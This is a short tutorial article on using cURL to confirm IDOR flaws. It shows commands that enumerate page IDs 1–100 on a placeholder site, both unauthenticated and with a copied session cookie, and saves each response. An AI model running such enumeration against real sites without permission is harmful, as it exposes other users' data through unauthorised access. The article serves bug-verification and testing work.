Abstract — The article explains how to use using Linux command cURL to exploit IDOR vulnerability both authenticated and unauthenticated manner.
Introduction
While searching for vulnerability or conducting investigation getting quick proof of concept (POC) to your assumption or hypothesis is important. It helps you in focusing better and getting desired results.
The article is divided into three (3) sections to help advanced users in skipping the unnecessary part of the article that covers basic.
- What is
cURLand How to usecURLon Linux? - Using
cURLto exploit IDOR to verify bug (Un-authenticated). - Using
cURLto exploit IDOR to verify bug (Authenticated).
What is cURL and How to use cURL on Linux?
cURL is a computer software project providing a library and command-line tool for transferring data using various network protocols. The name stands for “Client URL”. (Source — Wikipedia)
cURL is a tool to transfer data from or to a server, using one of the supported protocols (HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, DICT, TELNET, LDAP or FILE). The command is designed to work without user interaction.(Source — Linux Man pages)
Using cURL to exploit IDOR to verify bug (Un-authenticated)
curl ‘https://targetwebsite.tld/internalpage?pid=[1-100]' -H ‘User-Agent: Mozilla/5.0 (X11; Windows x86_64) Chrome/88.0.4500.0 Iron Safari/537.36’ — compressed — insecure -o ‘verification#1.log’
Destructing the command:
a. “-H” flag custom headers can be added to the request.
b. The request URL contains string [1–100] which iterates through the pages from 1 to 100. The -o flag ‘verification#1.log’ with string #1 helps in storing the content in the manner in the current directory as follows:
verification1.log
verification2.log
verification3.log
….
verification100.log
c. User-Agent: The browser user-agent string helps peers and the server to know Operating System, Browser and other details from where the request is originating.
Using curl to exploit IDOR to verify bug (Authenticated)
To exploit the bug in authenticated manner, it is suggested to copy paste request from the browser with the help of DevTools -> Network Tab -> Right Click on request and copy as cURL.
To exploit vulnerability with authentication it important to have session parameter and cookies present with the cURL request.
curl ‘https://targetwebsite.tld/internalpage?pid=[1-100]' -H ‘User-Agent: Mozilla/5.0 (X11; Windows x86_64) Chrome/88.0.4500.0 Iron Safari/537.36’ -H ‘Cookie: userid=31337; session_hash=a72832SjpeOlepwlk9c253’ — compressed — insecure -o ‘verification#1.log’
The rest of destructed request in explained in earlier section only additional part added to the request is
-H ‘Cookie: userid=31337; session_hash=a72832SjpeOlepwlk9c253’
